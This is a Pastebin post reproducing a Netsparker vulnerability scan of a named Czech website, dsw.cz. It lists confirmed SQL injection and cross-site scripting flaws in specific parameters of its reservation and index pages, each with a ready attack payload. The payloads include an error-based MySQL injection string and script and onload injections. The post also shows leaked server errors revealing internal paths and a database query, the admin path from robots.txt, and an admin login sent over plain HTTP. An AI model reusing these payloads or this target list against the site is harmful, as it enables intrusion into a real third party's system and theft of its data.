Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- Tittle: Data Storage Workshop
- URL: http://www.dsw.cz
- Scanner: Netsparker
- Screen: http://img24.eu/v.php?file=3tyvpmxi.jpg (Vulnerability Chart)
- |||
- Boolean Based SQL Injection
- Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
- Severity : Critical
- Confirmation : Confirmed
- Detection Accuracy :
- Vulnerable URL : http://www.dsw.cz/reserve
- Parameter Name: type
- Parameter Type: Post
- Attack Pattern: -1 OR 17-7=10
- |||
- [High Possibility] SQL Injection
- Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
- Severity : Critical
- Confirmation : Confirmed
- Detection Accuracy :
- Vulnerable URL : http://www.dsw.cz/reserve
- Parameter Name: step
- Parameter Type: Post
- Attack Pattern: NSFTW
- Severity : Critical
- Confirmation : Confirmed
- Detection Accuracy :
- Vulnerable URL : http://www.dsw.cz/reserve
- Parameter Name: type
- Parameter Type: Post
- Attack Pattern: %27
- |||
- SQL Injection
- Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
- Severity : Critical
- Confirmation : Confirmed
- Detection Accuracy :
- Vulnerable URL : http://www.dsw.cz/reserve
- Parameter Name: type
- Parameter Type: Post
- Attack Pattern: (select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))
- |||
- Cross-site Scripting
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Severity : Important
- Confirmation : Confirmed
- Detection Accuracy :
- Vulnerable URL : http://www.dsw.cz/reserve
- Parameter Name: type
- Parameter Type: Post
- Attack Pattern: '><script>alert(9)</script>
- Severity : Important
- Confirmation : Confirmed
- Detection Accuracy :
- Vulnerable URL : http://www.dsw.cz/index.php?pg=><body onload=alert(9)>
- Parameter Name: pg
- Parameter Type: Querystring
- Attack Pattern: ><body onload=alert(9)>
- |||
- [Possible] Permanent Cross-site Scripting
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Severity : Important
- Confirmation : Confirmed
- Detection Accuracy :
- Vulnerable URL : http://www.dsw.cz/reserve
- Injection URL: http://www.dsw.cz/lang.inc.php?lang='%22%3E%3Cnet%20sparker=netsparker(0x0001DB)%3E
- Parameter Name: back
- Parameter Type: Post
- Attack Pattern: %27
- -
- Error message:
- <--
- Warning: include(./lang/lang-\'\"><net sparker=netsparker(0x0001DB)>.php) [function.include]: failed to open stream: No such file or directory in /data/www/virtuals/expo-net.cz/www/index.php on line 19
- Warning: include() [function.include]: Failed opening './lang/lang-\'\"><net sparker=netsparker(0x0001DB)>.php' for inclusion (include_path='.:/usr/share/php:/usr/share/php5:/data/www/htdocs/PEAR') in /data/www/virtuals/expo-net.cz/www/index.php on line 19
- .css" rel="stylesheet" type="text/css" media="all" />
- Expo-net.cz
- Chyba vyberu z databaze
- SQL dotaz:
- SELECT cl.nadpis, cl.text, cl.perex, cl.gid, cg.id_menu FROM clanky_global AS cg LEFT JOIN \'\">_clanky AS cl ON cg.gid = cl.gid WHERE cg.identifikator = 'clanek_kalendar_bottom' AND cl.aktivni = 1 AND (cg.alias REGEXP '([[.vertical-line.]]51[[.vertical-line.]]){1}') ORDER BY cg.razeni DESC, cl.ulozeno DESC
- Chybova hlaska:
- 1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'\">_clanky AS cl ON cg.gid = cl.gid ' at line 7
- -->
- |||
- Password Transmitted Over HTTP
- Vulnerability Classifications: PCI 6.5.9 OWASP A9 CWE-311 319
- Severity : Important
- Confirmation : Confirmed
- Detection Accuracy :
- Vulnerable URL : http://www.dsw.cz/admin/index.php
- Form target action: index.php
- |||
- Robots.txt Identified
- http://www.dsw.cz/robots.txt
- User-Agent: *
- Disallow: /admin/
- Disallow: /tisk/
- Disallow: /foto/
- Disallow: /files/
- Disallow: /kosik*
- Disallow: /index.php?pg=rezervace*
- Disallow: /index.php?pg=processdata*
- |||
- [Possible] Internal Path Leakage (*nix)
- Vulnerability Classifications: PCI 6.5.6 CAPEC-118 CWE-200 209
- Severity : Information
- Confirmation : Confirmed
- Detection Accuracy :
- Vulnerable URL : http://www.dsw.cz/reserve
- Identified Internal Path(s): /usr/share/php:/usr/share/php5:/data/www/htdocs/PEAR
- Parameter Name: back
- Parameter Type: Post
- Attack Pattern: %27
- |||
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement